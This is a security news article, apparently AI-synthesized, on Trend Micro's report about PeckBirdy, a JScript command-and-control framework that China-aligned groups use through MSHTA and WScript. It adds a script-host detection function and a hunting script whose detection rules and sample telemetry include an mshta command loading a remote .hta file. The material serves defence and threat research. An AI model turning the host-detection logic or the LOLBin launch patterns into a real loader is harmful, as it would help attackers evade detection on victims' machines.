VYPR
Research · Published Jan 26, 2026 · Updated May 20, 2026 · 1 source

PeckBirdy: JScript-Based Framework Lets China-Aligned APTs Exploit LOLBins for Stealthy Operations

Trend Micro reveals PeckBirdy, a JScript-based C2 framework used by China-aligned APT groups since 2023 to abuse legitimate system tools for stealthy attacks on gambling and government targets.

Since 2023, China-aligned advanced persistent threat (APT) groups have been leveraging a previously undocumented script-based command-and-control framework dubbed PeckBirdy, according to a detailed report published by Trend Micro on January 26, 2026. The framework, implemented in the legacy JScript language, is designed to execute across multiple script hosts, including living-off-the-land binaries (LOLBins) such as MSHTA and WScript, which lets attackers maintain persistence while blending in with legitimate system activity and evading signature-based detection. Trend Micro researchers identified at least two campaigns employing PeckBirdy, targeting Chinese gambling websites as well as Asian government entities and private organizations.

PeckBirdy's versatility stems from its ability to run in browsers, MSHTA, WScript, Classic ASP, Node.js, and .NET environments via ScriptControl. Depending on the execution context, the framework's capabilities shift: in a browser it is confined to the sandboxed scope of the web page, while under MSHTA, which runs HTML Applications outside the browser sandbox with access to COM objects, it can act directly on the local machine. The framework uses a set of defined APIs to deliver landing scripts tailored to each execution environment, with embedded configuration parameters controlling host, port, attack ID, retry logic, and heartbeat intervals.
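As an added illustration (not PeckBirdy's code and not taken from Trend Micro's report), the following JScript-compatible JavaScript shows how a single script can tell which of these hosts it is running under, and how the capability split described above follows from that answer. The `detectHost` and `capabilityScope` names, the global-object parameter (used so the logic can be exercised offline), and the ".hta in the URL" heuristic for MSHTA are this example's assumptions; real MSHTA also runs scripts served without an .hta extension, and Internet Explorer exposes `ActiveXObject` too, so the heuristic is not a reliable fingerprint.

```javascript
// Added example: host-environment detection for a script that may be loaded
// by a browser, MSHTA, WScript, Classic ASP, Node.js, or an embedded engine.
// Written in ES3-style syntax (var, no arrow functions) so it is valid JScript
// as well as modern JavaScript. `g` is the host's global object; passing it in
// lets the function be tested with constructed stand-ins for each host.
function detectHost(g) {
  // Windows Script Host (wscript.exe / cscript.exe) exposes a WScript object.
  if (typeof g.WScript !== "undefined") {
    return "wscript";
  }
  // Classic ASP exposes Server/Request/Response but has no DOM window.
  if (typeof g.Server !== "undefined" && typeof g.Response !== "undefined" &&
      typeof g.window === "undefined") {
    return "classic-asp";
  }
  // Node.js exposes process.versions.node; browsers do not.
  if (typeof g.process === "object" && g.process !== null &&
      g.process.versions && typeof g.process.versions.node === "string") {
    return "node";
  }
  // MSHTA hosts an HTML Application: a DOM window exists and ActiveXObject is
  // usable without the browser's zone restrictions. Checking for an .hta
  // location is a heuristic assumption of this example, not a hard rule.
  if (typeof g.window !== "undefined") {
    var href = (g.document && g.document.location &&
                g.document.location.href) || "";
    if (typeof g.ActiveXObject !== "undefined" && /\.hta(\?|#|$)/i.test(href)) {
      return "mshta";
    }
    return "browser";
  }
  // Anything else (e.g. ScriptControl embedded in a .NET process) exposes only
  // the bare script engine: no DOM, no WScript, no process object.
  return "embedded";
}

// What the script can reach from each host. This mirrors the split the report
// draws: a browser page is sandboxed, while MSHTA and WScript give the script
// COM/WSH access to the local machine.
function capabilityScope(host) {
  if (host === "browser") return "page-sandbox";
  if (host === "wscript" || host === "mshta") return "local-machine";
  if (host === "node") return "local-machine";   // fs / child_process available
  if (host === "classic-asp") return "web-server"; // runs on the IIS host itself
  return "host-dependent";                         // embedded engine: depends on host
}
```

For defenders, the probes themselves are the detection hint: a script delivered by a web page that tests for `WScript` or `ActiveXObject` before deciding what to do is behaving like a multi-host loader rather than ordinary page code.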

The first campaign, tracked as SHADOW-VOID-044, began in 2023 and involved injecting malicious scripts into Chinese gambling websites. When victims visited these sites, the scripts downloaded and executed PeckBirdy's main routine, which displayed fake Google Chrome update pages to trick users into downloading backdoors. The second campaign, SHADOW-EARTH-045, observed from July 2024, targeted Asian government entities and private organizations by injecting PeckBirdy links into government websites, likely for credential harvesting. In one case, the injection was on a government login page; in another, the attacker used MSHTA to execute PeckBirdy as a remote access channel for lateral movement within a private organization.

Beyond its core functionality, PeckBirdy is extended by two modular backdoors: HOLODONUT and MKDOOR. These backdoors enhance the framework's attack capabilities, allowing for more sophisticated payload delivery and persistent access. The SHADOW-VOID-044 campaign also leveraged stolen code-signing certificates, Cobalt Strike payloads, and exploitation of CVE-2020-16040, a 2020 vulnerability in Chrome's V8 JavaScript engine, with payloads and command-and-control infrastructure spread across multiple domains and IP addresses to maintain access.

Trend Micro's TrendAI Vision One platform detects and blocks the indicators of compromise associated with PeckBirdy, providing customers with tailored threat hunting queries and intelligence reports. The researchers noted that the use of JScript—an old, widely available scripting language—means the framework can be launched across diverse environments without requiring additional dependencies, making it a flexible tool for APT operations. The findings were initially presented at the HitCon conference in August 2025 and are now being shared publicly to raise awareness.

The emergence of PeckBirdy underscores the ongoing evolution of China-aligned threat actor tactics, particularly their reliance on LOLBins and script-based frameworks to evade detection. By abusing legitimate system tools, these groups can operate under the radar of traditional security solutions, emphasizing the need for advanced behavioral detection and threat hunting capabilities. As the framework continues to be used in active campaigns, organizations in the gambling and government sectors should remain vigilant and implement robust monitoring for anomalous script execution.
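One concrete form of the monitoring recommended above, as an added example that is not drawn from the report or its indicators: flag script-host LOLBins (mshta.exe, wscript.exe, and wscript's console sibling cscript.exe, which the article does not name) when they are launched with a remote URL on the command line, the pattern described for MSHTA in the SHADOW-EARTH-045 case, or when they are spawned by a browser or Office process, as a fake-update lure would produce. Field names follow Sysmon-style process-creation events and are assumptions; the sample events are constructed for this example.

```javascript
// Added example: hunting logic for script-host LOLBins fetching remote scripts.
// Events are constructed stand-ins for process-creation telemetry (Sysmon
// Event ID 1-like fields: Image, ParentImage, CommandLine); not real logs.
var SCRIPT_HOSTS = {
  "mshta.exe": true,   // HTML Application host
  "wscript.exe": true, // Windows Script Host, GUI
  "cscript.exe": true  // Windows Script Host, console (not named in the report)
};

// Parents from which a script host should essentially never be launched.
var USER_FACING_PARENTS =
  /^(chrome|msedge|firefox|iexplore|winword|excel|powerpnt|outlook)\.exe$/i;

// "C:\Windows\System32\mshta.exe" -> "mshta.exe"
function baseName(path) {
  return String(path || "").split(/[\\/]/).pop().toLowerCase();
}

// First http(s) URL on the command line, or null if the script is local.
function remoteLocation(cmdline) {
  var m = String(cmdline || "").match(/(https?:\/\/[^\s"']+)/i);
  return m ? m[1] : null;
}

// Returns a finding for a suspicious event, or null if nothing stands out.
function assessEvent(ev) {
  var image = baseName(ev.Image);
  if (!SCRIPT_HOSTS[image]) return null;
  var reasons = [];
  var remote = remoteLocation(ev.CommandLine);
  if (remote) reasons.push("remote script location: " + remote);
  var parent = baseName(ev.ParentImage);
  if (USER_FACING_PARENTS.test(parent)) reasons.push("spawned by " + parent);
  if (reasons.length === 0) return null;
  return { host: ev.Computer, image: image, pid: ev.ProcessId, reasons: reasons };
}

function hunt(events) {
  var findings = [];
  for (var i = 0; i < events.length; i++) {
    var f = assessEvent(events[i]);
    if (f) findings.push(f);
  }
  return findings;
}

// Constructed sample telemetry: one MSHTA remote load from a browser (two
// reasons), two benign local script runs, a browser process that is not a
// script host, and a WScript launch from Word (parent reason only).
var SAMPLE_EVENTS = [
  { Computer: "WS01", ProcessId: 4120, Image: "C:\\Windows\\System32\\mshta.exe",
    ParentImage: "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
    CommandLine: "mshta.exe https://cdn.example.invalid/l/landing.hta" },
  { Computer: "WS02", ProcessId: 5233, Image: "C:\\Windows\\System32\\wscript.exe",
    ParentImage: "C:\\Windows\\System32\\svchost.exe",
    CommandLine: "wscript.exe //B C:\\ProgramData\\update.js" },
  { Computer: "WS03", ProcessId: 777, Image: "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
    ParentImage: "C:\\Windows\\explorer.exe",
    CommandLine: "chrome.exe https://gambling.example.invalid/" },
  { Computer: "SRV01", ProcessId: 912, Image: "C:\\Windows\\System32\\cscript.exe",
    ParentImage: "C:\\Windows\\System32\\cmd.exe",
    CommandLine: "cscript.exe //nologo C:\\Scripts\\inventory.vbs" },
  { Computer: "WS04", ProcessId: 6010, Image: "C:\\Windows\\System32\\wscript.exe",
    ParentImage: "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
    CommandLine: "wscript.exe C:\\Users\\Public\\invoice.js" }
];
```

The rules are deliberately narrow: a local .js run from a scheduled task (WS02) or an admin's inventory script (SRV01) is not flagged, so the two findings from `hunt(SAMPLE_EVENTS)` are the ones worth an analyst's time. In production the remote-location rule should also cover UNC paths and script hosts reading from user-writable directories, which this example leaves out.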

Synthesized by Vypr AI